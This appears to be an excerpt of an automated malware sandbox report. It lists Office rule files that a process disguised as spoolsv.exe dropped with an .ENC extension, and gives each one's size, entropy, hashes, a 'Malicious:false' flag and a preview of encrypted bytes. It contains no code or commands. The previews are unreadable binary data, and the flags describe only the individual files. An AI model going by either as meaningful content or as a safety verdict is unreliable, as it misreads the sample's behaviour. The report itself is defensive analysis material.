                                                                                                                                                                                                                                                      SHA-512:3C9E282F4966F1D25D10A408C1D17C8FE136FB3D032B3C971EE54C146CEE80C60C94FF86AF668BAB9CC01BC95F6FF15E593043E8F2324581BCFEFE4411C0BE6F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.G...P"'.#...r...[....O.&..2.f....u....]..v..u....d.L.>.....H._.R.F0...S.O.y.;..=.g$.....FN..P.\@.=.f....Su...".q..M.|uN..~..........P.O.l....[..j...E-.`.0=..i*.Q.T.y_G....&....x%..b..R.dzV....K..A...B...W..^....8....%...^.2U...\.....GmO..4...,.S....kO.R."..3....u...................=..L.....pS!.Y7..%]l7.L.{yUM7B..M.......wj..^...g..LJ.R,.c.....\....Yz...H.l...1......K@,....s..l.M.1...S4g..o.w..Pa....v..h9h.Q.]...1....;S..u.R{.-...v>,..f."@..nj/...(.9.A|../'.iN..1G........4.....^..#..%.L..e,.Xt^.Bc.>k8....s...|1..v..%x.....^.$o}w.m....?'.M..>aK#....E.6..#.Y..u..U...(...Q.DX....q....\:w$.N..Kj..x#...78......=n....Iha4R.6.`'.....,'qh...8.Q.7...o^.{.'Z..0i.?n.H...T.&.*d.F...j.}.nO.!.H.....9.>...c...k.^..8<....>..P......cu..n3..,.8r....R@D,z.....]V..R..F...l..)YJ.<xy..8..:...eudY.9.{%.K...D.X.2.x...I.?.H...5.B......B.p...k3...}1...."...U..1..{4.[I[.......x...4..}g.I.8J.5...n.#}.z...p!....:..C..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701550v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.8709913625204795
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Ruev5uqG7e2gDW2ZJfI8IOAe6ug8MBEZ7pTrIcHmItS5zj4bgwBzNisBW+uE:+vW7H2ZJQ8I3e6BvEZ1TMmtS5zj4L1cE
                                                                                                                                                                                                                                                      MD5:64028F289C5D3F93E4570407C206B668
                                                                                                                                                                                                                                                      SHA1:F71ED7B15E4A18D47C872C6CB1DC7A519653A779
                                                                                                                                                                                                                                                      SHA-256:94517F33D1D26F36C85F251BD064B875787FF09E63833BB50D58F03B4C039C59
                                                                                                                                                                                                                                                      SHA-512:81999EFEF67B3773C424932CDADB31E05DE3C655BCB7E46CFCB34E75D85D67CCE694B72FB580DD2020BCD13EB0EAB05E07870DCFBA49D0F75EB312F822969F7D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.;....K..[..'u...=[EUk.e36.d......F$.).5Y.;3wd.......C...LC..D2.f..Z.L;+.w....;.<..7O...O..R...?z...........@.E'>........P.E..Yc.SQG.o..%.ZD....F.70.>.J#..U..YS.....s.;..."u.J.NM2.Li..t]..v..gZ...z....'.kr..H?....ce+..4k..j.H..Y..E.}g....2...?.2..... .........,.~.L.%.....|.j....>.<.Q....(..#..2;0..8.byyc!I.W...../........d...M..[s....7..D..=.I.X4..J...K.+.k.;..B*9......D..`O../.u.,K+|.{._>...HJ.l2.......q.....V.:.#l....;9...:...s.N;\..I.Z..!..t..L..}..W....oK).8H..1....... .+.N.....8.Qj.HZ....V.......-Z..O<....4.Z.....].I@*Wh.<.Q.../.9Cw.n|.........mH0z.X..f.n.>..QH/Y....B..$#x..^['.^....ctn<.U........c.....(.*.t._..hI:......hX=c.:ld.i.p....d.. B.|uZ.z.Nr.....{.qX...Dxf.....g...>.....P.'!.B.h.P...-j....V\.m....Cj7Y.m.6Vi.5....q...s..7......':..08X>.~..A.............+.;."......UJ.1...d.>p..D .2..f7R.a...ch.#[.,..z......`...Y.iv.8TcG..fk.y."..j...c.'.<..j*._..@.N3....2<.Zj.S~..?)...u_..c.X.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701551v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8622418896061035
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+oPtBWcOP+fN1r4k5vkoJNB4+Jg2Ipa1KM+2yuBY9QI3K+/addvNs:+o3ogNV4mh4+JRd7Y9v3KhhC
                                                                                                                                                                                                                                                      MD5:76D886C946F039F4C6D02C17D6E76F31
                                                                                                                                                                                                                                                      SHA1:AEA7BFF04C732A8B6EE5DAB4ED065EE92E15127D
                                                                                                                                                                                                                                                      SHA-256:E4D16940B7F7CE7075EF77D67B812BF89C2A124EF0E233CE59D133975F8CBBB7
                                                                                                                                                                                                                                                      SHA-512:006A0CC718F1F685ADF1990C654F8337D0381F6EC59A8404619904075A757309ED1F9E354CA031E0A90DD494129FAB9D1AB4FC24E6617A6D6F307ACF4EFF30CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.2.^.y......-DT.H-PB7?.5_.8}.D.U..T.%V.)u.r}.~.T.c..6.v8.m.h).#....X1.....ms....P{.X....$gd.....A*.%........;%...x.R.m..{[.Kx..\%2..}.~..[.......... A..(>qD.X.u...N7.h.Q.Xh.=.TP..]...V...!.!{..^.4.L..O....a1w.7.TZQ....i.u...PcjZ.....Ix+....A.G..c.j.k.q.....)o.u[..7.u.D\....]......LTV.D...Dnzl....7U:...|...F....n..=.......sA.l...^.z.^..k..f..8....S.,#.....*.bX_.3e..!1V."...W....%.h....|...B.a....L.k......7..YG.....].4WL..'Ek....|.......p.)..%:E.D..j.....V.r..@......q{..1.)~..../F..uq.oc..1[D.^..v<D.)..F.(.;@...4.).ot........'u..<.....V.>........a...#.W.d0..:#n.:.`(I....#{.djFI...Dc.A..".4N...C.C.>}R.`N..k..e..I.l.6.T..%s....G./F....]h.Qr.x.R.A's.(......U.#<..a>.u.P.yt.P*...L.}.....gO:.4.G.0..f.*cT.G.........*.........<......!.........;.(....em .]Do.K..Om...m.....bmX.n../.$.e.X...uI.M.|......V.[...?-.3...... 9..Ro.[U..f......nW(...f...n.7....Q.)Eh.^.X.Y.U...#.@...k..Jp..k..D.W..r...H.J.S..3VIH.+N..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701650v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.856098731969166
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+tjo8XHiIN3Gr9ppJbM2HGg3wWAFAqnqvOzPpK4rBji6jWvHINFczJA:+C8XvN3ybfGg/ABt3Ri6j0IfuA
                                                                                                                                                                                                                                                      MD5:647C3274F00E3422F0C0218A29C7F69C
                                                                                                                                                                                                                                                      SHA1:5E3AA607D933AD257A0E5E905AF61D2DD31D0C37
                                                                                                                                                                                                                                                      SHA-256:BFE37FEAB0A20FB3715ACA9272E59EEC5A2BC6F68DCF18A9AB8825F8105CAA41
                                                                                                                                                                                                                                                      SHA-512:8DD08A657B452E77C286F3B70F8870ED7F00EF049790CA57060E4D2E3D4B2E7F61EA4B8B878B8948F5DE19132CCDC06A8C917978832CB131A1F854969336479C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.c9.8......Q.f........^v..E..,.t....|e.E.<....m!...m..E8.1pp5kX....e<.(l...}c...1>...*.)...nM.+...O.J....5...0~Y.....H.I...b..S.....!./[l.....z..c..B.r..1$......O...........=..1.r.2Kw...(`...!.^^H.........!.......n......_Wk)pkfV.(.3.y..M...........,G...N....-.....)...V;.n..V.W........"..U.....D.....R....cc.o..Jr..RGw.]......,..F..C.O.....{.IM.....F......}.i..OCG.PS..._..^.3...X.G.V,....!....+r..4.N.?..v..u..AH.;.K.k..b...~.`.^.g...>T....Q..\..a....%U...A.....5..A...v..%.EP.jx@3.Qc.jaPn.."..g.%...w..-.d^...W.#u.Z.^R.4......?K6u.....kq.e\T.=.o.Qv)...p#..........o\.k..p..s... ...(.bh..n.....W.......|.3]..^.1.J....5..v.f.o....T.Rc......w.Po..~..S...2......h._.X.f.....h........cr|..;h....i<.Ke. lq.L`P.......&...RjD...~..{.........{K.-K.*....\....Ji..MC..5Q..%..V........}..+s..%.F'._...2..Z..+..Y..^;.T.j.@s...u..WG;O+|<..V..,..W..Oz............l.K.....T......X.8.o...+*....3.'.|.g.k....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701651v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.834077412962904
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2tmkWXR4SsGcUUvBDmR8Bq6siIIXiiqyoCROU84m0NpeoGJ+Pl0nW3RvufT67LW:+28JLc9JQVIXiqRO85De02fURNeYkDfP
                                                                                                                                                                                                                                                      MD5:B5D8028A7788282AC09F2E704CBD6C7F
                                                                                                                                                                                                                                                      SHA1:FF2972519568DDD2D79A0293E492A64E87C98619
                                                                                                                                                                                                                                                      SHA-256:2E3BF3C5AE3D6AE8DC6D2E1A8CF6D1F9C0062558A6FC1D37C5C66F3B828793C2
                                                                                                                                                                                                                                                      SHA-512:F8490E520E54ED3AFB316D42E00FE760B2026AEADCEA0B630E4112839950DBAD4E604D71F850C65B8E07B9552BA25D3876D2E7E9E6B9C82BD4DFDBA755EFAC5B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.@......FaN.<.f.Dj.p.......).~..l....P...T.)..T?*$....-..I.q....L.B.,...A*S..g.md.[...HGm.....c...SCA..xK......\....9I..8WF......"...."K^.d7.....g?...|Z..0...LrS.p.ok..^..eD.-.`..i.4....8.....5..0.vY>...I.F...D....B..T=K_...W~..UrR.....h).-.}^.u..n.m.*m..+.b..n.f-.q.E.....@.... ...s6z.............,....nT..#..<,.........'.&.`..@W....W.a*g_.-_.b)6.R.>..>..b.8[....+Y.U.&..g...,gcSE....Gc3&qm.Kd..w.....GB.~.F..H@.+..|...R..i..(,.........X.aVW'.L......4WN*.AO t.J..j#.../Y.?S../d.!......ED..A"m...rL<._T...,@1....+.6Q....I]...k02*.N..r.....k.2.zk..@I..So8.Zx.?..C.<.{...]4.N>5..?......o..c.."f[ZPq,.....H:..{.MT..c.9.u.i6.O4U<....~....}fp...Gq.|.0j.h......cg.cc...#..|.....l:4.K.....].\n..S....c...P....../.8..`...... ..RI>.yg'.A..r.T.....aK........*h?#.C..Y..1..>..2z.Z!....X18+.k.F....r...ff..n.K>0U...$.... \#x9.....f~..7,]m....<.. ....:......#K.....iX.K....53+# A.l..N...KN..C......X........A....b?zT....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701700v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.87848690966527
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+UKyUDWn1H1WQyL2DKtAEyknB5fwIzE8f742xD2PlHPDHrlZ7BGwnmdX8XwZFC:+5yUDcH1pyLa4A6PT4KDcHPDvEwnmV8n
                                                                                                                                                                                                                                                      MD5:41D031E6E296D647CE11E12010AD4F8D
                                                                                                                                                                                                                                                      SHA1:3C890BF35C30EF9ADD0BBA7E678361C46B2F3381
                                                                                                                                                                                                                                                      SHA-256:7CBE76ED44EF46CC2523D1C438036314EE76867782C74A8AFE2A645BC8E3FCC1
                                                                                                                                                                                                                                                      SHA-512:00063F671E6BD0335C40F550CA3ED9AD2A3557CA7298D703D4494A2D4C26F31F1A14A7D060D3D4C5A92FBA69C42F05C6AF7CC1C7DB7ED72E8D84419ADC6993BE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.t..N.,.UN....s..:....2.9..\+F!TB.)W.Ml..~.....E...C1r.?.....(..l....{ .H...^.....H}..p.J.R$..9.3.........;.':/\....0..Y...0p.....$.1..Z...&,.$...F.K2/.dh..g<...*.R..9lY/.@ {,.`....0'M|..y..E..!.yTEV...p..6..DR...4...>.s+....>.D.u8...b7...G.D7.O|.......z).~.j.,...... m.G.^..<.wSr6e.....Y. ...q..@rx..c^.X..X;NJ.iJ.:..T..|.[A....my.4.q..X..-A..l......"-.....H..,%.gE.g{...b@p...B/.j.b............X...|.....r.A9.m.j....K..B.o..?Q)....k......~.'?{B.=1c..S....;..m..=i.'.|...[Jc..w........Z.SP.t8Z.#..&..@.s.O...r@......t....*.4..B.o..)O.;#.(...?.cj9S.BY].E..)......G.s.Q..... .Z.hp..4.v.......fOD..1@!.Cb.`..;?d..U.<.....j.w..99Q.!:O.........[S..!`A.N$}zwz.m..............=.| .e...+.........C..+.n...u..VFb.....$...j...FK.....'S.f47.....F.5.."...7.IJ}.}..(o..Z.){dyz...r.|.Q..E2i....^&.(%..}..)8OF.c..W>.........it.=&..=..j...se#.@z.p=...5.?5......1.......~u..1.9..+..da...........d

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.881418804520678
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+aioX13nh5qnPyQVuYDb7mhs53q1vmQH9Ebko4UP2H5uTuwwgIx0FET:+aio5nhkn6kP7mi1qNCPP2HPwFIea
                                                                                                                                                                                                                                                      MD5:EE2748CDBBA7809FE56EDAB65E0B9C49
                                                                                                                                                                                                                                                      SHA1:D5DE917F4CDEEEA271DBF3B391C051EF26C21E0E
                                                                                                                                                                                                                                                      SHA-256:3AD1A6402496829E6668A430545956ADC68C671E3E8EB8EEAB8C845D36B8CBA6
                                                                                                                                                                                                                                                      SHA-512:BA44E43D84BB5A4E1CFB471453C42EAD37A5BEE66BCAE07DEECF3B4F512BE1A2BED30E42ADAB36CECBF68E7FE264D4714FB0A14A2F767CD964466B5D2BE5AC9D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....n..+^.p...S.a......TQ..Y.. .q..ePH.{.<.vc_....G..O.u..c..RV.&EfW..7"[Y......~...}...GU..A.#....... ..LI8=..0.x.O.CM....)P......O....fl..lR...c.......+.............R..7H.P...r..6.z....o..>K....&&B.v/...+!..%.\F.x...E..<...O.d...Q..t.....%.Q.6y.(....4...a.Sd....J...6V........Eu.cL..A......B..&..m.T.".......I...*.W.{"...........`.}.._.%^e.:!.e.C...D.i.6{..P3.8.[^6hC.6.o.....a5>......d....,!&..jWl...+$...iC.bB.g......K....E.q........9.b'.....~.S.0...n.r.Q..r...l./.....ql.pQ...M........S.}..g..Fb.....}...j.+....w. .B'n#..~}|.~....<...\w,....T.bEsM.........X*.......C..K....]@.xO.U...<..T.k;......./..V.eJX....q.F.>.62....Z.!.d...2.hvY1..@..N......$V../..X....S].c...{.F...2.D...D....!...U(..$#Ifs..kU=)......b.l..Cq...Mt.. .......j..*......L.".M.@.....P<../3..Q....B;..g../v..?6.b.h.}..s..f|...`....^.5...B.....{N.d..:...K?.. 0r..y{$.H..._.....'.......k......A%.i.-...k.._8...i.W..71..O..M.....(e...f

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701750v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.877575686172602
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+47QCKWqttNkPgjTT2FBQ9vlWB/Os/qhJ7+Lg+FsEG8+LSt4uzFWnrZCA:+4kTWqCcEl674FvGOCQFWnrZb
                                                                                                                                                                                                                                                      MD5:A316AC6994578706EC57EFC78A300B68
                                                                                                                                                                                                                                                      SHA1:86EE90CA7E1A78570FAF13B9E12E3C9462D88D67
                                                                                                                                                                                                                                                      SHA-256:067CB6DED76D218519A55E611B9C87A70719B453D5F95026806A9439AE543483
                                                                                                                                                                                                                                                      SHA-512:47D6F72BF1CC99A3928E7A6AFA594BA74C48B71F4C691CE051868F567ECA625F10FEF6E1B9CDC5A34C8AA0E3C65F45436B04D8ECA5DE8B2E5406319DCC16D487
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.z......Y!V..zg.e?..........+ .V..{.B..w.'x..'3)A..h\..8qK.cgvD.y.r.56..p...Z..O.^./L..qy..(g...i>$..df..........6.K.....h......0=.f....1..._$3..b....AW..........`.A>+....X.a.....0...!.......'...i...Z.0....uQ.....I...S...z..7~JD.C7G...~..sp\.g.Yw...S.V%...O4.H2.u.....NJ..EB_s.>.;......P.<.M...*`f......>.....l.......Xz.k.t.......N....`V..k.OI'.!\.[.(..m...{G..\'...S.@,.Mw."..E:.T.k@.d.]....O..F...a..\..".........T.{.F.....4..Y...~.E.lJ..+..=..Fl.;Zu.O..4...Z!.Hc....Q.l.i:\_X.......zE`......7.7T...LJ$X.L..]q*\....0U%X...K^....p.....G.1=...X5....K.....pZ.H...U.zS....2"U9.+.s......&U....../.(......x.......i..^j?...iP...yC..f3..&Cq..O.....OW.N.,{."c... ....iw&...f...{...XWf..9.f.E....K.B...../r.B.h......./.......c..?....u/}N......8r...Z........S.<"I7.r.c|.&...H.'.L.........r.x.."x.|.7.zsj.PQ....F..J.."....t=4E.L.f.O.s..I7.M..6. ....*4Y........Fr:..j.k..1..mf.....^U. ......#...(#.!.iDj..|Fa..1

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.867652031753384
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Q2l2K7cxMWmpFK3Ivfi38nEuMaQbiEwQzHT1rZMdBckn04xTWm0lWyBXkEqXz90:+Qkgbmzyb7biEtzBe3M4VWMyJYXB+IpO
                                                                                                                                                                                                                                                      MD5:4ADD793A6FB13E6935AA83FF2DFD7B99
                                                                                                                                                                                                                                                      SHA1:922C89EAC2F60E69C6376DAA481664B8AC876685
                                                                                                                                                                                                                                                      SHA-256:60B15D9464CAC3A187CD37AF6979881C3826305A877BC80A5E34AFAB35896DBA
                                                                                                                                                                                                                                                      SHA-512:487D1BD316D5BC1647C2D8740353008EDCF0BED1B100E8610E5128A217EFCC2AD6030C880A5B9D47794B7B7F1FF92B5DCADAE439DD8C32634636EDCA194232E4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..Y(Z.....Vc1-..-:...6.D..|c.`..C....Hq.S.jc..6jl..tq\7..B.{hd(..$7.H n.n...}e.y..`d.H.V.K.f).......>u.b.X..NR.....g..k...<.5.c..Z..V........d.D.fx`...r*;fYn2Z].A. .l......#UI.;{..ys;.t.....4w}t..lS4s...3......4..[..s.e...Q....a.|..g1......y.......g.;..5.P.C.,.`...].s...Q...3..F..%.K.0.#I$..!(.....R..m.~2......r.+s/..>.@.R.Qj.T....q..B-...1.9..;.....;........6..M.ci.I...$Vb<H.x..<.....3.PE.+.. ..y.2l...~.).:.hf.)...7; T.c.=.G...2..'..N..Z..^.%.:$\.e(@......'x6.....v.T.=..]..jav.........<..B..Vv.....g.J+......8...\.......m.T/.....;.<....M^..@..U.w8O...?6......H...S..R.?.^.../C.a..Y!.f.s.m~..u....[..(n..D..z.86..I.x.._..^..#y..-.~9.....H.R...iYq........z.....7.&..*Q....S/.....N..@..c.....'M7>....nv.\.`.R.m........p...6...#I..v.9....f.q<.6[...C.T.w..[....1.f.....!.={........\..v.:...5.R...{..VIJ......K.<..-.b\.X............:..+.x"......u...@.5[.7s|...^>..,.h.V......b~.D........J_..F.i3P.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.87103367697662
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+ErJeQL/iZgr7f1BxoQcLQ+yQAfuBiZ0x/cGHc/4X7V1n03pYseQ2jx:+Ek0/iZ6orXUfylHc/+V1n0ZYseNx
                                                                                                                                                                                                                                                      MD5:3CDD96FC65C581A725A7AE84C3E50304
                                                                                                                                                                                                                                                      SHA1:BE069F834F736F0F75166D23DB63C30C62B576FD
                                                                                                                                                                                                                                                      SHA-256:4554C90738DF730471BAEF3635B983E2932958AB14B562431C915848D3B678E4
                                                                                                                                                                                                                                                      SHA-512:DD84B7DF12C7D434D2AF5BDC18582ACEB782C4D802E3E8E3A63ABCBA57D9B5852F18C73985561CAE0DBDB4BC2475F8C4082781EA04681FCEAB09E409C7B2CCB4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....=0d.!t.j..g.)..c.B.....+.j)}'*...K...[...x$...w...uu...).....]$8....;ofI..$......N.6.....d......M%..(.t..3..69.6(:.....L|d..PnlK6.?....8....Vc.cm.F.j#L...........n9N..-~Ax...eJu..N..z{"e....H...o.....,.(.;......aU'.....=..$.I.Uq...g.,Jn.]#....u...+.....+..t....Lz[..PA....X.q>........l.7.x.=..u&H~KwI..12..6...G.n......B.\'.....T...OW-4r|...:}1.l[..]..U.xO....Q.e+.q.lr.Y?.z...r..L.....P.....y.......sR....yi9"Ke.4...d.&;..Y4....K...b"."......_...1Dcp....]E..OdQ.w...7(|....n/=U4.X.G.c....x..9....$.O...C..e......<_....K.m@.>.t..m.u.y..<....~..*?/#q.5..]Y..x.._.B.Ly..;d..%....P3..&..Y...o....n^."..dM.!.qS.or\Z..n..6...Jjjs.hQB. U. d.{.R/-.....y4..'&}...V...[..k......R.$y.r...._.A..w..CyPi...gd...e....$Nn.'{ba.T>.o.0...&HR....K.....6..},%........I+.0T|......`...._.@..I......e&A...m..-...qZ&...h.h`2......p...v..]R.....9...Z..{.`.......528.6/>...F(....%u.q...o.G..:...Nf.ckP.yHM.}.\<&..w...~

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.871144627863304
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+eLUmYa41veDnyt1cVpwwTmAfdUyIkERPoepS/D4zwMZJBjL2lF:+nmPceDyrcV2wyAQaEznxL4
                                                                                                                                                                                                                                                      MD5:F05FB930280AB81E4EFEBDC4BB10D756
                                                                                                                                                                                                                                                      SHA1:01A2B57C40BAFF05F59101F94E0AFD9B15F5E554
                                                                                                                                                                                                                                                      SHA-256:71175946896D0EEE3FCABE84B44B74D718390310074B59A80CA5E6E1EC03870C
                                                                                                                                                                                                                                                      SHA-512:2B2A88F15C4956ACABE4E22ADBE6E9CC38D36AB08A76178551B599ECBAA422AA888A364F0EF243A6FDC5CE7B04178403496AF4F783C384B85046F17F586D1999
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..r.A.E.....i.h....8.8..H....v..7%{.M.P.3.fs...)}....#..h.#...{H...o......a........ ~..dC....D...GI.3...Tf.TxN..~.g2...xj..K.....().o@f...T.I..d.`r.M.S....T......YN.XS......z...2...Ef...$=.7N$z.if......^.\_..{r_z..Z.\8.M.;U./..|....K..V.I..W.X.8.u.BD.h...]fH.n6.W9..pZ..=K.;....#X...Y..... .j..8$.....u.Rad.ho.2.$..W..@.:.y...C..$JO..!...\)3f.~4.Z8.kyNf..@.3.....n.s..[.......wb.Lc....usE..C...e..g|{..._$o.C..-5...../k.q.v".%9d%...W.HS....C1C..:6.n>...d..Fxz._[..K.xhS..._...ze.2.3.!.v......m......8p..9>JE.+^!..M..........&8.5..n....}%.X*.70.....psD..{Q-...A..C....a....}...%......._..r.=.\...s8b...+\.a......d....g.......x;...r....<.(.`...H..00......]8.9...-0..1....>BW.Xu|.)..@2d..&tYU......2...>.q9.+."0z.1...6.1^.h..:.l../_..cd8.t/ku>....6.ikr....RkeI..4.....g.Op5..yW........e......A.]O..b......y~q.Uq.....e.)....V...H"h.?.0..k@.H...2...[.q.&4...\.@S.?!.G..n.H.$6\......A..EN+c.C.......Q...m'.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.869639865035792
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+e9qGnJhbqD/feMd6KjNfhRPwgpllXcqW6NZEvDtFCAK1+aWFbNcyMdX3JiT:+qq8bQ/fJd6KxfhRogyWZaVKodHcX5iT
                                                                                                                                                                                                                                                      MD5:5C108491803711126F680B8B2FAB28AD
                                                                                                                                                                                                                                                      SHA1:09A67FA0443DABA6438F18DE4E957739DF264370
                                                                                                                                                                                                                                                      SHA-256:4B6847DA5451AB79CC593E0FF55C62F5E91529B382354051B44BC56663091C7C
                                                                                                                                                                                                                                                      SHA-512:2FEFB59ECB2E72E880C7C53617573DA2C6FD7A1FD9D14E90A321159AB5BBE1B5262B0ABF18C4A901B5E474BFBE634DF20B45B1A72722043AA36E172A5D5F6912
                                                                                                                                                                                                                                                      Malicious:false
